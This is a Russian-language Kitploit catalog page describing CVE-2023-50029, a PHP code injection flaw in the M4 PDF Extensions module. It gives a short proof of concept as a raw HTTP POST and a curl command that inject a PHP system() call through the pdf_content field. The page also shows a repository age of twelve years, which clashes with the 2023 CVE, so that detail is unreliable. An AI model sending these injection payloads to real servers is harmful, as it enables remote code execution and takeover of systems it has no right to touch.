Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PHP-Injection-in-M4-PDF-Extensions — CVE-2023-50029: Уязвимость внедрения PHP в модуле M4 PDF Extensions | Kitploit
Инструменты/GitHubGitHub/absholi7ly/php-injection-in-m4-pdf-extensions
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubabsholi7ly/php-injection-in-m4-pdf-extensions

PHP-Injection-in-M4-PDF-Extensions

CVE-2023-50029: Уязвимость внедрения PHP в модуле M4 PDF Extensions

Репозиторий
12 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Внедрение PHP в M4 PDF Extensions

CVE-2023-50029 — это уязвимость внедрения PHP в модуле M4 PDF Extensions. Эта уязвимость позволяет атакующим внедрять и выполнять произвольный PHP-код на сервере, что дает им возможность получить полный контроль над целевой системой. Проблема заключается в неправильной проверке вводимых данных, что позволяет передавать вредоносный код через пользовательские параметры.

Poc

root@kitploit:~
POST /generate_pdf.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

pdf_content=<?php system('uname -a'); ?>

Или Curl

root@kitploit:~
curl -X POST http://example.com/generate_pdf.php -d "pdf_content=<?php system('uname -a'); ?>"
Скачать инструмент